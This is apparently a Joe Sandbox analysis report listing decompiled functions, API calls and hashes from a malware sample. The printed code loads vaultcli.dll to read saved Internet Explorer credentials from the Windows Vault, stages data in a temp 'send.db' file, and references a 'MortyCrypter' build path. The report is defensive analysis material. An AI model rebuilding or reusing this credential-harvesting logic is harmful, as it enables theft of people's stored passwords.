                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040A4B5(void* __ecx) {
                                      				int _t15;
                                      				void* _t18;
                                      
                                      				_t18 = __ecx;
                                      				FreeLibrary( *(__ecx + 0xac));
                                      				 *((intOrPtr*)(_t18 + 0xac)) = 0;
                                      				FreeLibrary( *(_t18 + 0xa0));
                                      				 *(_t18 + 0xa0) = 0;
                                      				FreeLibrary( *(_t18 + 0xa4));
                                      				 *(_t18 + 0xa4) = 0;
                                      				FreeLibrary( *(_t18 + 0xb0));
                                      				 *(_t18 + 0xb0) = 0;
                                      				_t15 = FreeLibrary( *(_t18 + 0xa8));
                                      				 *(_t18 + 0xa8) = 0;
                                      				return _t15;
                                      			}





                                      0x0040a4be
                                      0x0040a4c6
                                      0x0040a4d0
                                      0x0040a4d6
                                      0x0040a4de
                                      0x0040a4e4
                                      0x0040a4ec
                                      0x0040a4f2
                                      0x0040a4fa
                                      0x0040a500
                                      0x0040a502
                                      0x0040a50b

                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00409C45), ref: 0040A4C6
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00409C45), ref: 0040A4D6
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00409C45), ref: 0040A4E4
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00409C45), ref: 0040A4F2
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00409C45), ref: 0040A500
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 89d995fca74ae760273f22ae6f34871d135d8462be52c88fddb1750221ee5945
                                      • Instruction ID: 71d699067d81a156cb771d2a1ac33f1489cf9796781138b2e1d61bf39ca45e0e
                                      • Opcode Fuzzy Hash: 89d995fca74ae760273f22ae6f34871d135d8462be52c88fddb1750221ee5945
                                      • Instruction Fuzzy Hash: A9F0A575B01B16BED7095F759C84B86FE65FF4A260F01422B966C42211CBB16430DFD2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040A139(void* __ecx) {
                                      				int _t15;
                                      				void* _t18;
                                      
                                      				_t18 = __ecx;
                                      				FreeLibrary( *(__ecx + 0xac));
                                      				 *((intOrPtr*)(_t18 + 0xac)) = 0;
                                      				FreeLibrary( *(_t18 + 0xa0));
                                      				 *(_t18 + 0xa0) = 0;
                                      				FreeLibrary( *(_t18 + 0xa4));
                                      				 *(_t18 + 0xa4) = 0;
                                      				FreeLibrary( *(_t18 + 0xb0));
                                      				 *(_t18 + 0xb0) = 0;
                                      				_t15 = FreeLibrary( *(_t18 + 0xa8));
                                      				 *(_t18 + 0xa8) = 0;
                                      				return _t15;
                                      			}





                                      0x0040a142
                                      0x0040a14a
                                      0x0040a154
                                      0x0040a15a
                                      0x0040a162
                                      0x0040a168
                                      0x0040a170
                                      0x0040a176
                                      0x0040a17e
                                      0x0040a184
                                      0x0040a186
                                      0x0040a18f

                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,004096F7), ref: 0040A14A
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,004096F7), ref: 0040A15A
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,004096F7), ref: 0040A168
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,004096F7), ref: 0040A176
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,004096F7), ref: 0040A184
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 89d995fca74ae760273f22ae6f34871d135d8462be52c88fddb1750221ee5945
                                      • Instruction ID: 71d699067d81a156cb771d2a1ac33f1489cf9796781138b2e1d61bf39ca45e0e
                                      • Opcode Fuzzy Hash: 89d995fca74ae760273f22ae6f34871d135d8462be52c88fddb1750221ee5945
                                      • Instruction Fuzzy Hash: A9F0A575B01B16BED7095F759C84B86FE65FF4A260F01422B966C42211CBB16430DFD2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 61%
                                      			E00409D15(void* __ecx, void* __edx, void* __eflags) {
                                      				char _v8;
                                      				char _v12;
                                      				char _v16;
                                      				char _v20;
                                      				char _v24;
                                      				intOrPtr _v28;
                                      				char _v32;
                                      				char _v36;
                                      				char _v40;
                                      				char _v44;
                                      				char _v48;
                                      				char _v52;
                                      				char _v56;
                                      				char _v60;
                                      				char _v64;
                                      				char _v68;
                                      				char _v72;
                                      				char _v76;
                                      				char _v80;
                                      				char _v84;
                                      				char _v92;
                                      				char _v96;
                                      				char _v100;
                                      				void* _t124;
                                      				void* _t127;
                                      				intOrPtr _t129;
                                      				void* _t133;
                                      				intOrPtr _t147;
                                      				void* _t148;
                                      				void* _t159;
                                      				void* _t162;
                                      				void* _t186;
                                      				char _t226;
                                      				intOrPtr _t229;
                                      				char _t234;
                                      				void* _t235;
                                      
                                      				_t234 = 0;
                                      				_t186 = __ecx;
                                      				_t226 = 0;
                                      				_v16 = 0;
                                      				_v44 = 0;
                                      				_v20 = 0;
                                      				_v12 = 0;
                                      				_v8 = 0;
                                      				_v84 = 0;
                                      				if(E0040A06B(__ecx) != 0) {
                                      					_push( &_v16);
                                      					_push(0);
                                      					_push(0x416140);
                                      					if( *((intOrPtr*)(__ecx + 0x84))() == 0) {
                                      						_push( &_v20);
                                      						_push( &_v44);
                                      						_push(0x200);
                                      						_push(_v16);
                                      						if( *((intOrPtr*)(__ecx + 0x8c))() == 0) {
                                      							_t240 = _v44;
                                      							if(_v44 != 0) {
                                      								_v80 = 0;
                                      								_v40 = 0;
                                      								_v36 = 0;
                                      								do {
                                      									_t124 = E0040A038(_t240);
                                      									_push(0x10);
                                      									_push(0x416130);
                                      									if(_t124 == 0) {
                                      										_push(_t226);
                                      										_v28 = _v20 + _v40;
                                      										_t127 = E00401000();
                                      										_t235 = _t235 + 0xc;
                                      										__eflags = _t127;
                                      										if(__eflags == 0) {
                                      											E004033AB( &_v32,  *((intOrPtr*)(_v28 + 0x10)));
                                      											_t133 = E0040300E( &_v32, E004033AB( &_v64, L"Internet Explorer"));
                                      											E004058FB(_v64);
                                      											_v64 = _t234;
                                      											__eflags = _t133;
                                      											if(__eflags != 0) {
                                      												asm("movaps xmm0, [0x4147c0]");
                                      												asm("movups [ebp-0x60], xmm0");
                                      												E004031FD( &_v100, E004033AB( &_v68,  *((intOrPtr*)(_v8 + 0x14)) + 0x20));
                                      												E004058FB(_v68);
                                      												_v68 = _t234;
                                      												E004031FD( &_v96, E004033AB( &_v72,  *((intOrPtr*)(_v8 + 0x18)) + 0x20));
                                      												E004058FB(_v72);
                                      												_v12 = _t234;
                                      												_t147 = _v28;
                                      												_v72 = _t234;
                                      												_t148 =  *((intOrPtr*)(_t186 + 0x90))(_v16, _t147,  *((intOrPtr*)(_t147 + 0x14)),  *((intOrPtr*)(_t147 + 0x18)), _t234, _t234, _t234,  &_v12);
                                      												__eflags = _t148;
                                      												if(_t148 == 0) {
                                      													_v8 = _v12;
                                      													__eflags =  *((intOrPtr*)(_v28 + 0x1c)) + 0x20;
                                      													E004031FD( &_v84, E004033AB( &_v76,  *((intOrPtr*)(_v28 + 0x1c)) + 0x20));
                                      													E004058FB(_v76);
                                      													_v76 = _t234;
                                      												}
                                      												_t235 = _t235 - 0x10;
                                      												E00401ED8(_t235,  &_v100);
                                      												E00401F0E(_t186);
                                      												E0040138F( &_v100);
                                      											}
                                      											E004058FB(_v32);
                                      											_v32 = _t234;
                                      											goto L18;
                                      										}
                                      									} else {
                                      										_t226 = _v36 + _v20;
                                      										_push(_t226);
                                      										_v8 = _t226;
                                      										_t159 = E00401000();
                                      										_t235 = _t235 + 0xc;
                                      										if(_t159 == 0) {
                                      											E004033AB( &_v24,  *((intOrPtr*)(_t226 + 0x10)));
                                      											_t162 = E0040300E( &_v24, E004033AB( &_v48, L"Internet Explorer"));
                                      											E004058FB(_v48);
                                      											_v48 = _t234;
                                      											if(_t162 != 0) {
                                      												_t229 = _v8;
                                      												asm("movaps xmm0, [0x4147c0]");
                                      												asm("movups [ebp-0x60], xmm0");
                                      												E004031FD( &_v100, E004033AB( &_v52,  *((intOrPtr*)(_t229 + 0x14)) + 0x20));
                                      												E004058FB(_v52);
                                      												_v52 = _t234;
                                      												E004031FD( &_v96, E004033AB( &_v56,  *((intOrPtr*)(_t229 + 0x18)) + 0x20));
                                      												E004058FB(_v56);
                                      												_v12 = _t234;
                                      												_push( &_v12);
                                      												_push(_t234);
                                      												_push(_t234);
                                      												_push(_t234);
                                      												_push( *((intOrPtr*)(_t229 + 0x18)));
                                      												_v56 = _t234;
                                      												_push( *((intOrPtr*)(_t229 + 0x14)));
                                      												_push(_t229);
                                      												_push(_v16);
                                      												if( *((intOrPtr*)(_t186 + 0x90))() == 0) {
                                      													_v8 = _v12;
                                      													E004031FD( &_v92, E004033AB( &_v60,  *((intOrPtr*)(_v12 + 0x1c)) + 0x20));
                                      													E004058FB(_v60);
                                      													_v60 = _t234;
                                      												}
                                      												_t235 = _t235 - 0x10;
                                      												E00401ED8(_t235,  &_v100);
                                      												E00401F0E(_t186);
                                      												E0040138F( &_v100);
                                      											}
                                      											E004058FB(_v24);
                                      											_v24 = _t234;
                                      											L18:
                                      											_t226 = _v8;
                                      										}
                                      									}
                                      									_v36 = _v36 + 0x38;
                                      									_t129 = _v80 + 1;
                                      									_v40 = _v40 + 0x34;
                                      									_v80 = _t129;
                                      								} while (_t129 < _v44);
                                      								_t234 = _v84;
                                      							}
                                      						}
                                      					}
                                      				}
                                      				if(_v20 != 0) {
                                      					 *((intOrPtr*)(_t186 + 0x98))(_v20);
                                      				}
                                      				if(_v16 != 0) {
                                      					 *((intOrPtr*)(_t186 + 0x88))( &_v16);
                                      				}
                                      				FreeLibrary( *(_t186 + 0xb8));
                                      				E004058FB(_t234);
                                      				E004058FB(0);
                                      				return E004058FB(0);
                                      			}







































                                      0x00409d1d
                                      0x00409d1f
                                      0x00409d22
                                      0x00409d24
                                      0x00409d27
                                      0x00409d2a
                                      0x00409d2d
                                      0x00409d30
                                      0x00409d33
                                      0x00409d3d
                                      0x00409d46
                                      0x00409d47
                                      0x00409d48
                                      0x00409d55
                                      0x00409d5e
                                      0x00409d62
                                      0x00409d63
                                      0x00409d68
                                      0x00409d73
                                      0x00409d7c
                                      0x00409d7e
                                      0x00409d84
                                      0x00409d87
                                      0x00409d8a
                                      0x00409d8d
                                      0x00409d8d
                                      0x00409d92
                                      0x00409d94
                                      0x00409d9b
                                      0x00409ebf
                                      0x00409ec0
                                      0x00409ec3
                                      0x00409ec8
                                      0x00409ecb
                                      0x00409ecd
                                      0x00409edc
                                      0x00409ef2
                                      0x00409efc
                                      0x00409f01
                                      0x00409f04
                                      0x00409f06
                                      0x00409f12
                                      0x00409f19
                                      0x00409f2d
                                      0x00409f35
                                      0x00409f43
                                      0x00409f50
                                      0x00409f58
                                      0x00409f60
                                      0x00409f64
                                      0x00409f6d
                                      0x00409f77
                                      0x00409f7d
                                      0x00409f7f
                                      0x00409f8a
                                      0x00409f90
                                      0x00409f9d
                                      0x00409fa5
                                      0x00409faa
                                      0x00409faa
                                      0x00409fad
                                      0x00409fb6
                                      0x00409fbd
                                      0x00409fc5
                                      0x00409fc5
                                      0x00409fcd
                                      0x00409fd2
                                      0x00000000
                                      0x00409fd2
                                      0x00409da1
                                      0x00409da4
                                      0x00409da7
                                      0x00409da8
                                      0x00409dab
                                      0x00409db0
                                      0x00409db5
                                      0x00409dc1
                                      0x00409dd7
                                      0x00409de1
                                      0x00409de6
                                      0x00409deb
                                      0x00409df1
                                      0x00409df7
                                      0x00409dfe
                                      0x00409e12
                                      0x00409e1a
                                      0x00409e28
                                      0x00409e35
                                      0x00409e3d
                                      0x00409e45
                                      0x00409e48
                                      0x00409e49
                                      0x00409e4a
                                      0x00409e4b
                                      0x00409e4c
                                      0x00409e4f
                                      0x00409e52
                                      0x00409e55
                                      0x00409e56
                                      0x00409e61
                                      0x00409e69
                                      0x00409e7c
                                      0x00409e84
                                      0x00409e89
                                      0x00409e89
                                      0x00409e8c
                                      0x00409e95
                                      0x00409e9c
                                      0x00409ea4
                                      0x00409ea4
                                      0x00409eac
                                      0x00409eb1
                                      0x00409fd5
                                      0x00409fd5
                                      0x00409fd5
                                      0x00409db5
                                      0x00409fdb
                                      0x00409fdf
                                      0x00409fe0
                                      0x00409fe4
                                      0x00409fe7
                                      0x00409ff0
                                      0x00409ff0
                                      0x00409d7e
                                      0x00409d73
                                      0x00409d55
                                      0x00409ff7
                                      0x00409ffc
                                      0x00409ffc
                                      0x0040a006
                                      0x0040a00c
                                      0x0040a00c
                                      0x0040a018
                                      0x0040a020
                                      0x0040a027
                                      0x0040a037

                                      APIs
                                        • Part of subcall function 0040A06B: LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040A073
                                      • FreeLibrary.KERNEL32(?), ref: 0040A018
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                        • Part of subcall function 0040300E: lstrcmpW.KERNEL32(?,?), ref: 00403018
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                        • Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrarylstrcpylstrlen$LoadVirtuallstrcmp
                                      • String ID: 4$8$Internet Explorer
                                      • API String ID: 708496175-747916358
                                      • Opcode ID: 83ea670e64d5cb21433631d671bd2a9a3595ebe1fe406b078e82ef2790373a8c
                                      • Instruction ID: d6e6ed69a0d1030da036c5e31fcde384690f90dc3ec3a168eb29360f78ef386c
                                      • Opcode Fuzzy Hash: 83ea670e64d5cb21433631d671bd2a9a3595ebe1fe406b078e82ef2790373a8c
                                      • Instruction Fuzzy Hash: 03A12071D00619ABCF04EFA6C8959EEBB79FF44305F10402AF805B7292DB38AE55DB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 58%
                                      			E0040D56A() {
                                      				intOrPtr _v6;
                                      				signed int _v12;
                                      				intOrPtr _v272;
                                      				intOrPtr _v280;
                                      				intOrPtr _v284;
                                      				char _v288;
                                      				struct HINSTANCE__* _t33;
                                      				intOrPtr _t35;
                                      				intOrPtr _t38;
                                      				intOrPtr _t53;
                                      				intOrPtr _t62;
                                      				_Unknown_base(*)()* _t69;
                                      				void* _t71;
                                      
                                      				_v288 = 0x11c;
                                      				_t33 = LoadLibraryA("ntdll.dll");
                                      				if(_t33 == 0) {
                                      					L3:
                                      					_t71 = 2;
                                      					if(_v272 != _t71) {
                                      						goto L43;
                                      					} else {
                                      						_t35 = _v6;
                                      						if(_t35 != 1) {
                                      							if(_t35 == 2 || _t35 == 3) {
                                      								if(_v284 != 5) {
                                      									if(_v284 != 6) {
                                      										if(_v284 != 0xa || _v280 != 0) {
                                      											goto L43;
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x2710;
                                      										}
                                      									} else {
                                      										_t38 = _v280;
                                      										if(_t38 != 0) {
                                      											if(_t38 != 1) {
                                      												if(_t38 != _t71) {
                                      													if(_t38 != 3) {
                                      														goto L43;
                                      													} else {
                                      														return (_v12 & 0x0000ffff) + 0x189c;
                                      													}
                                      												} else {
                                      													return (_v12 & 0x0000ffff) + 0x1838;
                                      												}
                                      											} else {
                                      												return (_v12 & 0x0000ffff) + 0x17d4;
                                      											}
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x1770;
                                      										}
                                      									}
                                      								} else {
                                      									if(_v280 != 1) {
                                      										if(_v280 != _t71) {
                                      											goto L43;
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x1450;
                                      										}
                                      									} else {
                                      										return (_v12 & 0x0000ffff) + 0x13ec;
                                      									}
                                      								}
                                      							} else {
                                      								goto L43;
                                      							}
                                      						} else {
                                      							if(_v284 != 5) {
                                      								if(_v284 != 6) {
                                      									if(_v284 != 0xa || _v280 != 0) {
                                      										goto L43;
                                      									} else {
                                      										return (_v12 & 0x0000ffff) + 0x3e8;
                                      									}
                                      								} else {
                                      									_t53 = _v280;
                                      									if(_t53 != 0) {
                                      										if(_t53 != 1) {
                                      											if(_t53 != _t71) {
                                      												if(_t53 != 3) {
                                      													goto L43;
                                      												} else {
                                      													return (_v12 & 0x0000ffff) + 0x276;
                                      												}
                                      											} else {
                                      												return (_v12 & 0x0000ffff) + 0x26c;
                                      											}
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x262;
                                      										}
                                      									} else {
                                      										return (_v12 & 0x0000ffff) + 0x258;
                                      									}
                                      								}
                                      							} else {
                                      								_t62 = _v280;
                                      								if(_t62 != 0) {
                                      									if(_t62 != 1) {
                                      										if(_t62 != _t71) {
                                      											goto L43;
                                      										} else {
                                      											return (_v12 & 0x0000ffff) + 0x208;
                                      										}
                                      									} else {
                                      										return (_v12 & 0x0000ffff) + 0x1fe;
                                      									}
                                      								} else {
                                      									return (_v12 & 0x0000ffff) + 0x1f4;
                                      								}
                                      							}
                                      						}
                                      					}
                                      				} else {
                                      					_t69 = GetProcAddress(_t33, "RtlGetVersion");
                                      					if(_t69 == 0) {
                                      						L43:
                                      						return 0;
                                      					} else {
                                      						 *_t69( &_v288);
                                      						goto L3;
                                      					}
                                      				}
                                      			}
















                                      0x0040d578
                                      0x0040d582
                                      0x0040d58a
                                      0x0040d5a9
                                      0x0040d5ab
                                      0x0040d5b2
                                      0x00000000
                                      0x0040d5b8
                                      0x0040d5b8
                                      0x0040d5bd
                                      0x0040d67c
                                      0x0040d68d
                                      0x0040d6bd
                                      0x0040d70a
                                      0x00000000
                                      0x0040d715
                                      0x0040d71f
                                      0x0040d71f
                                      0x0040d6bf
                                      0x0040d6bf
                                      0x0040d6c7
                                      0x0040d6d7
                                      0x0040d6e6
                                      0x0040d6f6
                                      0x00000000
                                      0x0040d6f8
                                      0x0040d702
                                      0x0040d702
                                      0x0040d6e8
                                      0x0040d6f2
                                      0x0040d6f2
                                      0x0040d6d9
                                      0x0040d6e3
                                      0x0040d6e3
                                      0x0040d6c9
                                      0x0040d6d3
                                      0x0040d6d3
                                      0x0040d6c7
                                      0x0040d68f
                                      0x0040d696
                                      0x0040d6a9
                                      0x00000000
                                      0x0040d6ab
                                      0x0040d6b5
                                      0x0040d6b5
                                      0x0040d698
                                      0x0040d6a2
                                      0x0040d6a2
                                      0x0040d696
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040d5c3
                                      0x0040d5ca
                                      0x0040d60b
                                      0x0040d65c
                                      0x00000000
                                      0x0040d66f
                                      0x0040d679
                                      0x0040d679
                                      0x0040d60d
                                      0x0040d60d
                                      0x0040d615
                                      0x0040d625
                                      0x0040d634
                                      0x0040d644
                                      0x00000000
                                      0x0040d64a
                                      0x0040d654
                                      0x0040d654
                                      0x0040d636
                                      0x0040d640
                                      0x0040d640
                                      0x0040d627
                                      0x0040d631
                                      0x0040d631
                                      0x0040d617
                                      0x0040d621
                                      0x0040d621
                                      0x0040d615
                                      0x0040d5cc
                                      0x0040d5cc
                                      0x0040d5d4
                                      0x0040d5e4
                                      0x0040d5f3
                                      0x00000000
                                      0x0040d5f9
                                      0x0040d603
                                      0x0040d603
                                      0x0040d5e6
                                      0x0040d5f0
                                      0x0040d5f0
                                      0x0040d5d6
                                      0x0040d5e0
                                      0x0040d5e0
                                      0x0040d5d4
                                      0x0040d5ca
                                      0x0040d5bd
                                      0x0040d58c
                                      0x0040d592
                                      0x0040d59a
                                      0x0040d720
                                      0x0040d723
                                      0x0040d5a0
                                      0x0040d5a7
                                      0x00000000
                                      0x0040d5a7
                                      0x0040d59a

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040D582
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040D592
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: a6414c01c92aabc54e3dac894ac6b41c5d20304dc033d076b823929ad4d20eec
                                      • Instruction ID: 964498e7b8206f6121ba622e0b87865c0d2dc345f445b9a64492767920e746fb
                                      • Opcode Fuzzy Hash: a6414c01c92aabc54e3dac894ac6b41c5d20304dc033d076b823929ad4d20eec
                                      • Instruction Fuzzy Hash: AD412F70D0012CA6DF248B95D8063FE76B4AB5574DF0408F6E549F52C1E67CCED8CAA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00410898(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                      				char _v8;
                                      				signed int _v28;
                                      				char _v32;
                                      				short _v2080;
                                      				void* _t35;
                                      				void* _t37;
                                      
                                      				_t35 = __edx;
                                      				_t37 = __ecx;
                                      				E00401052( &_v2080, 0, 0x400);
                                      				GetTempPathW(0x400,  &_v2080);
                                      				lstrcatW( &_v2080, L"send.db");
                                      				_t38 = _t37 + 4;
                                      				E004031FD(_t37 + 4, E004033AB( &_v8,  &_v2080));
                                      				E004058FB(_v8);
                                      				_t8 =  &_v28;
                                      				_v28 = _v28 & 0x00000000;
                                      				asm("xorps xmm0, xmm0");
                                      				_v32 = 0x35;
                                      				asm("movups [ebp-0x14], xmm0");
                                      				E0040343F(E00403527( &_v32, _t35, _t38),  *_t8, _a4);
                                      				E0040342B( &_v32);
                                      				return _a4;
                                      			}









                                      0x00410898
                                      0x004108b2
                                      0x004108b4
                                      0x004108c4
                                      0x004108d6
                                      0x004108e2
                                      0x004108f1
                                      0x004108f9
                                      0x00410901
                                      0x00410901
                                      0x00410908
                                      0x0041090b
                                      0x00410913
                                      0x0041091e
                                      0x00410926
                                      0x00410931

                                      APIs
                                      • GetTempPathW.KERNEL32(00000400,?), ref: 004108C4
                                      • lstrcatW.KERNEL32 ref: 004108D6
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                        • Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                      • String ID: 5$send.db
                                      • API String ID: 891666058-2022884741
                                      • Opcode ID: 2e83ca42c7ddf60e184d2c6e61082ebea31056ff0cc13da8152b21cf05e2b563
                                      • Instruction ID: f57ce377c97b75718f04c6484f3f53e292781d36d0101067abc2075b94b27c93
                                      • Opcode Fuzzy Hash: 2e83ca42c7ddf60e184d2c6e61082ebea31056ff0cc13da8152b21cf05e2b563
                                      • Instruction Fuzzy Hash: 40015E71D0011CABCB10EB65DC46BEEBBBCAF55309F00807AB505B6091EF789B56CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 72%
                                      			E0040E649(void* __ecx, void* __eflags) {
                                      				void* _v8;
                                      				char _v12;
                                      				char _v16;
                                      				intOrPtr _v40;
                                      				char _v44;
                                      				void* _t9;
                                      				intOrPtr* _t10;
                                      				intOrPtr _t23;
                                      				void* _t30;
                                      
                                      				_t30 = __eflags;
                                      				_t9 = E0040E476();
                                      				_push(__ecx);
                                      				_t10 = E0040E579(_t9, "VirtualQuery", _t30);
                                      				if(_t10 != 0) {
                                      					_t10 =  *_t10(E0040E649,  &_v44, 0x1c);
                                      					_t23 = _v40;
                                      					_t32 = _t23;
                                      					if(_t23 != 0) {
                                      						E0040E2EC(_t23, _t32);
                                      						MessageBoxA(0, "Bla2", "Bla2", 0);
                                      						_push(_t23);
                                      						_v12 = 0;
                                      						E0040E6C4( &_v16, _t32, E004033AB( &_v8, L"C:\\Users\\louis\\Documents\\workspace\\MortyCrypter\\MsgBox.exe"),  &_v12);
                                      						E004058FB(_v8);
                                      						_v8 = 0;
                                      						return E004058FB(0);
                                      					}
                                      				}
                                      				return _t10;
                                      			}












                                      0x0040e649
                                      0x0040e650
                                      0x0040e655
                                      0x0040e65d
                                      0x0040e665
                                      0x0040e672
                                      0x0040e674
                                      0x0040e677
                                      0x0040e679
                                      0x0040e67b
                                      0x0040e68b
                                      0x0040e691
                                      0x0040e695
                                      0x0040e6aa
                                      0x0040e6b2
                                      0x0040e6b9
                                      0x00000000
                                      0x0040e6bc
                                      0x0040e679
                                      0x0040e6c3

                                      APIs
                                        • Part of subcall function 0040E579: lstrcmpA.KERNEL32(?,?,?,0040A3BD,?,?,00000104,00000000), ref: 0040E5B2
                                      • MessageBoxA.USER32 ref: 0040E68B
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                        • Part of subcall function 0040E6C4: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040E6FF
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$CreateFreeMessageProcessVirtuallstrcmplstrcpy
                                      • String ID: Bla2$C:\Users\louis\Documents\workspace\MortyCrypter\MsgBox.exe$VirtualQuery
                                      • API String ID: 1196126833-430247600
                                      • Opcode ID: a6867b57453382faa7294a4e82b85834bd000ec9836fb0b52c152156ef19a725
                                      • Instruction ID: 262eba1185e5246f796a0a0cd151821592391dc29fb670a253c8ff67aa86d558
                                      • Opcode Fuzzy Hash: a6867b57453382faa7294a4e82b85834bd000ec9836fb0b52c152156ef19a725
                                      • Instruction Fuzzy Hash: 45F08F71A002086ACB18FBA7EC52CEF7A6C8F44304B10487EB801B21C1DF384A6086AC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 58%
                                      			E0040D22A() {
                                      				intOrPtr _v6;
                                      				char _v288;
                                      				struct HINSTANCE__* _t4;
                                      				intOrPtr _t5;
                                      				_Unknown_base(*)()* _t9;
                                      
                                      				_v288 = 0x11c;
                                      				_t4 = LoadLibraryA("ntdll.dll");
                                      				if(_t4 == 0) {
                                      					L3:
                                      					_t5 = _v6;
                                      					if(_t5 == 2 || _t5 == 3) {
                                      						return 1;
                                      					} else {
                                      						goto L5;
                                      					}
                                      				} else {
                                      					_t9 = GetProcAddress(_t4, "RtlGetVersion");
                                      					if(_t9 == 0) {
                                      						L5:
                                      						return 0;
                                      					} else {
                                      						 *_t9( &_v288);
                                      						goto L3;
                                      					}
                                      				}
                                      			}








                                      0x0040d238
                                      0x0040d242
                                      0x0040d24a
                                      0x0040d265
                                      0x0040d265
                                      0x0040d26a
                                      0x0040d278
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040d24c
                                      0x0040d252
                                      0x0040d25a
                                      0x0040d270
                                      0x0040d273
                                      0x0040d25c
                                      0x0040d263
                                      0x00000000
                                      0x0040d263
                                      0x0040d25a

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040D242
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040D252
                                      Strings
